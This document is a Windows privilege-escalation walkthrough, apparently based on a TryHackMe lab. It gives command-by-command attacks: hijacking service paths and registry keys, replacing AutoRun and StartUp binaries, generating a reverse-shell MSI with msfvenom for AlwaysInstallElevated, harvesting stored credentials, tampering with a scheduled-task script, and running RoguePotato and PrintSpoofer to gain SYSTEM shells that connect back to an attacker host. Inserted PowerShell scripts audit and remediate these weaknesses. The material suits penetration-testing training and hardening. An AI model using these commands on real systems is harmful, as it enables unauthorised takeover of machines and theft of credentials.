Windows
# AccessChk can be downloaded at https://learn.microsoft.com/en-us/sysinternals/downloads/accesschk
# Use accesschk.exe to check the "user" account's permissions on the "daclsvc" service
C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc
Note that the "user" account has the permission to change the service config (SERVICE_CHANGE_CONFIG).
Query the service and note that it runs with SYSTEM privileges (SERVICE_START_NAME):
sc qc daclsvc
Modify the service config and set the BINARY_PATH_NAME (binpath) to the reverse.exe executable you created:
sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""
Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:
net start daclsvc
Query the "unquotedsvc" service and note that it runs with SYSTEM privileges (SERVICE_START_NAME) and that the BINARY_PATH_NAME is unquoted and contains spaces.
sc qc unquotedsvc
Using accesschk.exe, note that the BUILTIN\Users group is allowed to write to the C:\Program Files\Unquoted Path Service\ directory:
C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"
Copy the reverse.exe executable you created to this directory and rename it Common.exe:
copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"
Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:
#If the service is already running stop it first.
net stop unquotedsvc
net start unquotedsvc
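The two service weaknesses above (a DACL that grants a low-privileged account SERVICE_CHANGE_CONFIG, and an unquoted BINARY_PATH_NAME containing spaces) can be audited across every LocalSystem service in one pass. The script below is an added example, not part of the original page or of Tib3rius' room material; it assumes Windows PowerShell 5.1 or later and an elevated prompt, and parses the SDDL that `sc sdshow` prints rather than relying on accesschk.

```powershell
# Added audit example (not from the original page): flags LocalSystem services whose
# DACL lets low-privileged principals reconfigure them (the daclsvc case) or whose
# binary path is unquoted and contains spaces (the unquotedsvc case).
# Assumes Windows PowerShell 5.1+; run from an elevated prompt.

# Principals that every logged-on or low-privileged user belongs to.
$LowPrivSids = @(
    'S-1-1-0',      # Everyone
    'S-1-5-11',     # Authenticated Users
    'S-1-5-4',      # NT AUTHORITY\INTERACTIVE
    'S-1-5-32-545'  # BUILTIN\Users
)

# Service access bits that allow reconfiguring the service, or granting oneself the
# right to: SERVICE_CHANGE_CONFIG (0x2, "DC" in SDDL), WRITE_DAC (0x40000),
# WRITE_OWNER (0x80000), GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000).
$ReconfigureMask = 0x2 -bor 0x40000 -bor 0x80000 -bor 0x40000000 -bor 0x10000000

# Parses the SDDL printed by "sc sdshow <name>" and returns the low-privileged
# principals granted any of the bits above.
function Get-ServiceReconfigurers([string]$Name) {
    $sddl = sc.exe sdshow $Name |
        ForEach-Object { $_.Trim() } |
        Where-Object { $_ -like 'D:*' } |
        Select-Object -First 1
    if (-not $sddl) { return }
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace -isnot [System.Security.AccessControl.CommonAce]) { continue }
        if ($ace.AceType -ne [System.Security.AccessControl.AceType]::AccessAllowed) { continue }
        if (-not ($ace.AccessMask -band $ReconfigureMask)) { continue }
        if ($LowPrivSids -contains $ace.SecurityIdentifier.Value) {
            $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value
        }
    }
}

# Extracts the executable from a service's BINARY_PATH_NAME (Win32_Service.PathName).
function Get-ServiceBinaryPath([string]$PathName) {
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }        # quoted: take the quoted part
    if ($PathName -match '^(.+?\.exe)(\s|$)') { return $Matches[1] } # unquoted: up to the first .exe
    return ($PathName -split '\s+')[0]
}

# True when the path is unquoted and the executable path itself contains a space,
# so a file planted at an earlier space-delimited prefix would be started instead.
function Test-UnquotedServicePath([string]$PathName) {
    return ($PathName -notmatch '^"') -and ((Get-ServiceBinaryPath $PathName) -match ' ')
}

$findings = foreach ($svc in (Get-CimInstance Win32_Service | Where-Object { $_.StartName -eq 'LocalSystem' })) {
    if (Test-UnquotedServicePath $svc.PathName) {
        [pscustomobject]@{ Service = $svc.Name; Issue = 'Unquoted path with spaces'; Detail = $svc.PathName }
    }
    foreach ($who in Get-ServiceReconfigurers $svc.Name) {
        [pscustomobject]@{ Service = $svc.Name; Issue = 'Low-priv principal can change config'; Detail = $who }
    }
}
$findings | Format-Table -AutoSize
```

Anything reported is fixed the same way it was found: quote the path with `sc config <name> binpath= "\"C:\path with spaces\service.exe\""`, and replace the offending ACE with `sc sdset <name> <sddl>` so that only administrators and SYSTEM hold SERVICE_CHANGE_CONFIG, WRITE_DAC and WRITE_OWNER.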
Query the "regsvc" service and note that it runs with SYSTEM privileges (SERVICE_START_NAME).
sc qc regsvc
Using accesschk.exe, note that the registry entry for the regsvc service is writable by the "NT AUTHORITY\INTERACTIVE" group (essentially all logged-on users):
C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
Overwrite the ImagePath registry key to point to the reverse.exe executable you created:
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:
#If the service is running stop it first.
net stop regsvc
net start regsvc
Query the "filepermsvc" service and note that it runs with SYSTEM privileges (SERVICE_START_NAME).
sc qc filepermsvc
Using accesschk.exe, note that the service binary (BINARY_PATH_NAME) file is writable by everyone:
C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
Copy the reverse.exe executable you created and replace the filepermservice.exe with it:
copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y
Start a listener on Kali and then start the service to spawn a reverse shell running with SYSTEM privileges:
#If the service is running stop it first.
net stop filepermsvc
net start filepermsvc
Query the registry for AutoRun executables:
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Using accesschk.exe, note that one of the AutoRun executables is writable by everyone:
C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"
Copy the reverse.exe executable you created and overwrite the AutoRun executable with it:
copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y
Start a listener on Kali and then restart the Windows VM. Open a new RDP session to trigger a reverse shell running with admin privileges. You should not have to authenticate to trigger it; if the payload does not fire, log in as an admin (admin/password123) to trigger it. Note that in a real-world engagement you would have to wait for an administrator to log in themselves!
rdesktop 10.10.255.248
Query the registry for AlwaysInstallElevated keys:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Note that both keys are set to 1 (0x1).
On Kali, generate a reverse shell Windows Installer (reverse.msi) using msfvenom. Update the LHOST IP address accordingly:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=53 -f msi -o reverse.msi
Transfer the reverse.msi file to the C:\PrivEsc directory on Windows (use the SMB server method from earlier).
Start a listener on Kali and then run the installer to trigger a reverse shell running with SYSTEM privileges:
msiexec /quiet /qn /i C:\PrivEsc\reverse.msi
# Keep in mind when using MSI installer exploits that you should avoid running
# multiple MSI installers. Usually you get one shot; after that the box will need
# to be reverted.
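The policy only takes effect when both the HKLM and the HKCU value are set to 1, which is the condition the two `reg query` commands above confirm. The function below is an added example, not from the original page or the room material; it assumes Windows PowerShell 5.1 or later, reports the two values and the resulting policy state, and with `-Remediate` sets any value that is 1 back to 0 (the permanent fix is to remove the setting from the Group Policy that pushed it, otherwise it will be reapplied).

```powershell
# Added example (not from the original page): reports whether the AlwaysInstallElevated
# policy is in effect and, with -Remediate, clears it. The policy applies only when BOTH
# the machine (HKLM) and the current user's (HKCU) value are 1. Assumes Windows PowerShell 5.1+.
function Test-AlwaysInstallElevated {
    [CmdletBinding(SupportsShouldProcess)]
    param([switch]$Remediate)

    $keys = @{
        Machine = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
        User    = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    }
    $state = @{}
    foreach ($scope in $keys.Keys) {
        # A missing key or value counts as 0 (policy not configured).
        $value = Get-ItemProperty -Path $keys[$scope] -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        $state[$scope] = if ($value) { [int]$value.AlwaysInstallElevated } else { 0 }
    }
    $enabled = ($state.Machine -eq 1) -and ($state.User -eq 1)

    if ($enabled -and $Remediate) {
        foreach ($scope in $keys.Keys) {
            if ($state[$scope] -eq 1 -and $PSCmdlet.ShouldProcess($keys[$scope], 'Set AlwaysInstallElevated to 0')) {
                Set-ItemProperty -Path $keys[$scope] -Name AlwaysInstallElevated -Value 0 -Type DWord
            }
        }
    }
    [pscustomobject]@{ MachineValue = $state.Machine; UserValue = $state.User; PolicyInEffect = $enabled }
}

Test-AlwaysInstallElevated                       # report only
# Test-AlwaysInstallElevated -Remediate -WhatIf  # preview the fix, then drop -WhatIf to apply it
```

Because the HKCU half is per user, run the check in the context of each account that matters (or audit the policy centrally) rather than trusting a single session's result.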
The registry can be searched for keys and values that contain the word "password":
reg query HKLM /f password /t REG_SZ /s
If you want to save some time, query this specific key to find admin AutoLogon credentials:
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
On Kali, use the winexe command to spawn a command prompt running with admin privileges (update the password with the one you found):
winexe -U 'admin%password' //10.10.255.248 cmd.exe
List any saved credentials:
cmdkey /list
Note that credentials for the "admin" user are saved. If they aren't, run the C:\PrivEsc\savecred.bat script to refresh the saved credentials.
Start a listener on Kali and run the reverse.exe executable using runas with the admin user's saved credentials:
runas /savecred /user:admin C:\PrivEsc\reverse.exe
View the contents of the C:\DevTools\CleanUp.ps1 script:
type C:\DevTools\CleanUp.ps1
The script seems to be running as SYSTEM every minute. Using accesschk.exe, note that you have the ability to write to this file:
C:\PrivEsc\accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1
Start a listener on Kali and then append a line to the C:\DevTools\CleanUp.ps1 which runs the reverse.exe executable you created:
echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1
Wait for the Scheduled Task to run, which should trigger the reverse shell as SYSTEM.
Start an RDP session as the "user" account:
rdesktop -u user -p password321 10.10.255.248
Double-click the "AdminPaint" shortcut on your Desktop. Once it is running, open a command prompt and note that Paint is running with admin privileges:
tasklist /V | findstr mspaint.exe
In Paint, click "File" and then "Open". In the open file dialog box, click in the navigation input and paste: file://c:/windows/system32/cmd.exe
Press Enter to spawn a command prompt running with admin privileges.
Using accesschk.exe, note that the BUILTIN\Users group can write files to the StartUp directory:
C:\PrivEsc\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
Using cscript, run the C:\PrivEsc\CreateShortcut.vbs script which should create a new shortcut to your reverse.exe executable in the StartUp directory:
cscript C:\PrivEsc\CreateShortcut.vbs
Start a listener on Kali, and then simulate an admin logon using RDP and the credentials you previously extracted:
rdesktop -u admin 10.10.255.248
A shell running as admin should connect back to your listener.
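Several of the cases above share one root cause: something that runs as SYSTEM or an administrator (a service binary, a service's registry key, a Run entry, a scheduled task's script, the all-users StartUp folder) sits in a location that low-privileged principals can write to. The script below is an added example, not from the original page or the room material, that audits those locations in one pass. It assumes Windows PowerShell 5.1 or later on Windows 8 / Server 2012 or newer (for the ScheduledTasks module), an elevated prompt, and that auto-start command lines point at files with common executable extensions (.exe, .ps1, .bat, .cmd, .vbs, .dll); the `Get-LowPrivWriters` and `Get-PathsInCommandLine` helpers are this example's own.

```powershell
# Added audit example (not from the original page): lists auto-start files, directories
# and registry keys that low-privileged principals can write to, covering the regsvc,
# filepermsvc, AutoRun, CleanUp.ps1 scheduled task and StartUp folder cases.
# Assumes Windows PowerShell 5.1+ on Windows 8 / Server 2012 or newer; run elevated.

$LowPrivSids = 'S-1-1-0', 'S-1-5-11', 'S-1-5-4', 'S-1-5-32-545'   # Everyone, Authenticated Users, INTERACTIVE, Users
$SystemIds   = 'SYSTEM', 'S-1-5-18', 'NT AUTHORITY\SYSTEM'        # how task principals name the SYSTEM account

# Rights that let a principal replace content or re-permission the object:
# WriteData/SetValue (0x2), AppendData/CreateSubKey (0x4), DELETE (0x10000),
# WRITE_DAC (0x40000), WRITE_OWNER (0x80000), GENERIC_ALL (0x10000000), GENERIC_WRITE (0x40000000).
$WriteMask = 0x2 -bor 0x4 -bor 0x10000 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000

# Returns the low-privileged principals with write access on a file, directory or
# registry key; returns nothing when the ACL is sound or cannot be read.
function Get-LowPrivWriters([string]$Path) {
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $rights = if ($ace -is [System.Security.AccessControl.FileSystemAccessRule]) { [int]$ace.FileSystemRights } else { [int]$ace.RegistryRights }
        if (-not ($rights -band $WriteMask)) { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { continue }
        if ($LowPrivSids -contains $sid) { $ace.IdentityReference.Value }
    }
}

# Pulls existing file paths out of a command line, whether quoted ("C:\Program Files\x\a.exe" /arg),
# unquoted with spaces (C:\Program Files\Autorun Program\program.exe) or an argument (-File C:\DevTools\CleanUp.ps1).
function Get-PathsInCommandLine([string]$CommandLine) {
    $pattern = '"([^"]+)"|([A-Za-z]:\\.+?\.(?:exe|ps1|bat|cmd|vbs|dll))'
    foreach ($m in [regex]::Matches($CommandLine, $pattern, 'IgnoreCase')) {
        $p = if ($m.Groups[1].Success) { $m.Groups[1].Value } else { $m.Groups[2].Value }
        if (Test-Path -LiteralPath $p -PathType Leaf) { $p }
    }
}

$findings = New-Object System.Collections.Generic.List[object]
function Add-Finding([string]$Source, [string]$Path) {
    foreach ($who in Get-LowPrivWriters $Path) {
        $findings.Add([pscustomobject]@{ Source = $Source; Path = $Path; WritableBy = $who })
    }
}

# 1. LocalSystem services: the binary, its directory and the service's registry key.
foreach ($svc in (Get-CimInstance Win32_Service | Where-Object { $_.StartName -eq 'LocalSystem' })) {
    foreach ($bin in (Get-PathsInCommandLine $svc.PathName | Select-Object -First 1)) {
        Add-Finding "Service $($svc.Name) binary" $bin
        Add-Finding "Service $($svc.Name) binary directory" (Split-Path -Parent $bin)
    }
    Add-Finding "Service $($svc.Name) registry key" "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)"
}

# 2. Machine-wide Run entries, which execute at every interactive logon.
foreach ($key in 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
                 'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run') {
    if (-not (Test-Path $key)) { continue }
    foreach ($prop in ((Get-ItemProperty -Path $key).PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' })) {
        foreach ($bin in Get-PathsInCommandLine ([string]$prop.Value)) { Add-Finding "Run value $($prop.Name)" $bin }
    }
}

# 3. Enabled scheduled tasks that run as SYSTEM: every file their actions reference.
foreach ($task in (Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' -and $SystemIds -contains $_.Principal.UserId })) {
    foreach ($action in $task.Actions) {
        foreach ($bin in Get-PathsInCommandLine "$($action.Execute) $($action.Arguments)") {
            Add-Finding "Task $($task.TaskName) action" $bin
        }
    }
}

# 4. The all-users StartUp folder.
Add-Finding 'All-users StartUp folder' ([Environment]::GetFolderPath('CommonStartup'))

if ($findings.Count -eq 0) { 'No writable auto-start locations found.' } else { $findings | Format-Table -AutoSize }
```

Each finding names the principal to remove from the ACL (`icacls <path> /remove:g "BUILTIN\Users"` for files and directories; the registry key's permissions through `regedit` or `Set-Acl`). A Run entry or task is only as dangerous as the account it runs under, so treat hits under 1 and 3 as SYSTEM-level and hits under 2 and 4 as elevation to whichever administrator logs on.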
Set up a socat redirector on Kali, forwarding Kali port 135 to port 9999 on Windows:
sudo socat tcp-listen:135,reuseaddr,fork tcp:10.10.255.248:9999
Start a listener on Kali. Simulate getting a service account shell by logging into RDP as the admin user, starting an elevated command prompt (right-click -> run as administrator) and using PSExec64.exe to trigger the reverse.exe executable you created with the permissions of the "local service" account:
C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" C:\PrivEsc\reverse.exe
Start another listener on Kali.
Now, in the "local service" reverse shell you triggered, run the RoguePotato exploit to trigger a second reverse shell running with SYSTEM privileges (update the IP address with your Kali IP accordingly):
C:\PrivEsc\RoguePotato.exe -r 10.10.10.10 -e "C:\PrivEsc\reverse.exe" -l 9999
whoami /priv
# If SeImpersonatePrivilege is enabled, the host is likely vulnerable to the PrintSpoofer LPE.
# https://github.com/dievus/printspoofer
PrintSpoofer.exe -i -c cmd
https://blog.geoda-security.com/2017/06/elevate-from-admin-to-nt-authoritysystem.html
https://tryhackme.com/room/windows10privesc - Windows PrivEsc room by Tib3rius
https://academy.tcm-sec.com/courses - TCM Windows Privilege Escalation course